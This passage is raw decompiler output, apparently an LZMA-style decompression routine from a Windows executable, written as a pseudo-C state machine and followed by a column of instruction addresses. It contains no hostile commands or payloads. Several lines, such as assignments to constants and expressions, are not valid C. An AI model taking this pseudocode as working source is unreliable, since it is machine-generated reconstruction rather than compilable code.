									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                            0x00000000
                                                            0x00406d5f
                                                            0x00406d5f
                                                            0x00406d64
                                                            0x00406ddb
                                                            0x00406de2
                                                            0x00406dec
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073ce
                                                            0x004073ce
                                                            0x004073d4
                                                            0x004073da
                                                            0x004073e0
                                                            0x004073fa
                                                            0x004073fd
                                                            0x00407403
                                                            0x0040740e
                                                            0x00407410
                                                            0x004073e2
                                                            0x004073e2
                                                            0x004073f1
                                                            0x004073f5
                                                            0x004073f5
                                                            0x0040741a
                                                            0x00407441
                                                            0x00407441
                                                            0x00407447
                                                            0x00407447
                                                            0x00000000
                                                            0x0040741c
                                                            0x0040741c
                                                            0x00407420
                                                            0x004075cf
                                                            0x00000000
                                                            0x004075cf
                                                            0x0040742c
                                                            0x00407433
                                                            0x0040743b
                                                            0x0040743e
                                                            0x00000000
                                                            0x0040743e
                                                            0x00406d66
                                                            0x00406d66
                                                            0x00406d6a
                                                            0x00406d72
                                                            0x00406d75
                                                            0x00406d77
                                                            0x00406d7a
                                                            0x00406d7c
                                                            0x00406d81
                                                            0x00406d84
                                                            0x00406d8b
                                                            0x00406d92
                                                            0x00406d95
                                                            0x00406da0
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406daf
                                                            0x00406dcd
                                                            0x00406dcf
                                                            0x00406fa2
                                                            0x00406fa2
                                                            0x00406fa5
                                                            0x00406fa8
                                                            0x00406fab
                                                            0x00406fae
                                                            0x00406fb1
                                                            0x00406fb4
                                                            0x00406fb7
                                                            0x00406fba
                                                            0x00406fc0
                                                            0x00406fd8
                                                            0x00406fdb
                                                            0x00406fde
                                                            0x00406fe1
                                                            0x00406fe1
                                                            0x00406fe4
                                                            0x00406fea
                                                            0x00406fc2
                                                            0x00406fc2
                                                            0x00406fca
                                                            0x00406fcf
                                                            0x00406fd1
                                                            0x00406fd3
                                                            0x00406fd3
                                                            0x00406ff4
                                                            0x00406ff7
                                                            0x00406f9a
                                                            0x00406fa0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00406f75
                                                            0x00406f79
                                                            0x00407581
                                                            0x00000000
                                                            0x00407581
                                                            0x00406f7f
                                                            0x00406f82
                                                            0x00406f85
                                                            0x00406f89
                                                            0x00406f8c
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f97
                                                            0x00000000
                                                            0x00406f97
                                                            0x00406db1
                                                            0x00406db1
                                                            0x00406db4
                                                            0x00406dba
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbf
                                                            0x00406dc2
                                                            0x00406dc4
                                                            0x00406dc5
                                                            0x00406dc8
                                                            0x00406e35
                                                            0x00406e35
                                                            0x00406e39
                                                            0x00406e3c
                                                            0x00406e3f
                                                            0x00406e42
                                                            0x00406e45
                                                            0x00406e46
                                                            0x00406e49
                                                            0x00406e4b
                                                            0x00406e51
                                                            0x00406e54
                                                            0x00406e57
                                                            0x00406e5a
                                                            0x00406e5d
                                                            0x00406e63
                                                            0x00406e7f
                                                            0x00406e82
                                                            0x00406e85
                                                            0x00406e88
                                                            0x00406e8f
                                                            0x00406e95
                                                            0x00406e99
                                                            0x00406e65
                                                            0x00406e65
                                                            0x00406e69
                                                            0x00406e71
                                                            0x00406e76
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7a
                                                            0x00406ea3
                                                            0x00406ea6
                                                            0x00406e1d
                                                            0x00406e1d
                                                            0x00406e23
                                                            0x00406ed6
                                                            0x00406edc
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ede
                                                            0x00406ee1
                                                            0x00406ee4
                                                            0x00406ee7
                                                            0x00406eea
                                                            0x00406eed
                                                            0x00406ef0
                                                            0x00406ef3
                                                            0x00406ef6
                                                            0x00406efc
                                                            0x00406f14
                                                            0x00406f17
                                                            0x00406f1a
                                                            0x00406f1d
                                                            0x00406f1d
                                                            0x00406f20
                                                            0x00406f26
                                                            0x00406efe
                                                            0x00406efe
                                                            0x00406f06
                                                            0x00406f0b
                                                            0x00406f0d
                                                            0x00406f0f
                                                            0x00406f0f
                                                            0x00406f30
                                                            0x00406f33
                                                            0x00406eb1
                                                            0x00406eb5
                                                            0x00407575
                                                            0x00000000
                                                            0x00407575
                                                            0x00406ebb
                                                            0x00406ebe
                                                            0x00406ec1
                                                            0x00406ec5
                                                            0x00406ec8
                                                            0x00406ece
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed3
                                                            0x00406ed3
                                                            0x00406f33
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3e
                                                            0x00406f3e
                                                            0x00406f41
                                                            0x00406f44
                                                            0x00406f48
                                                            0x0040758d
                                                            0x00000000
                                                            0x0040758d
                                                            0x00406f4e
                                                            0x00406f51
                                                            0x00406f54
                                                            0x00406f57
                                                            0x00406f5a
                                                            0x00406f5d
                                                            0x00406f60
                                                            0x00406f62
                                                            0x00406f65
                                                            0x00406f68
                                                            0x00406f6b
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x0040710a
                                                            0x0040710a
                                                            0x0040710d
                                                            0x0040710d
                                                            0x00000000
                                                            0x0040710d
                                                            0x00406e2f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406eac
                                                            0x00406df8
                                                            0x00406dfc
                                                            0x00407569
                                                            0x004075e5
                                                            0x004075ed
                                                            0x004075f4
                                                            0x004075f6
                                                            0x004075fd
                                                            0x00407601
                                                            0x00407601
                                                            0x00406e02
                                                            0x00406e05
                                                            0x00406e08
                                                            0x00406e0c
                                                            0x00406e0f
                                                            0x00406e15
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e1a
                                                            0x00000000
                                                            0x00406e1a
                                                            0x00406ea6
                                                            0x00406daf
                                                            0x00406be3
                                                            0x00406be3
                                                            0x00406bec
                                                            0x004075fa
                                                            0x004075fa
                                                            0x00000000
                                                            0x004075fa
                                                            0x00406bf2
                                                            0x00000000
                                                            0x00406bfd
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c06
                                                            0x00406c09
                                                            0x00406c0c
                                                            0x00406c10
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c16
                                                            0x00406c19
                                                            0x00406c1b
                                                            0x00406c1c
                                                            0x00406c1f
                                                            0x00406c21
                                                            0x00406c22
                                                            0x00406c24
                                                            0x00406c27
                                                            0x00406c2c
                                                            0x00406c31
                                                            0x00406c3a
                                                            0x00406c4d
                                                            0x00406c50
                                                            0x00406c5c
                                                            0x00406c84
                                                            0x00406c86
                                                            0x00406c94
                                                            0x00406c94
                                                            0x00406c98
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c88
                                                            0x00406c88
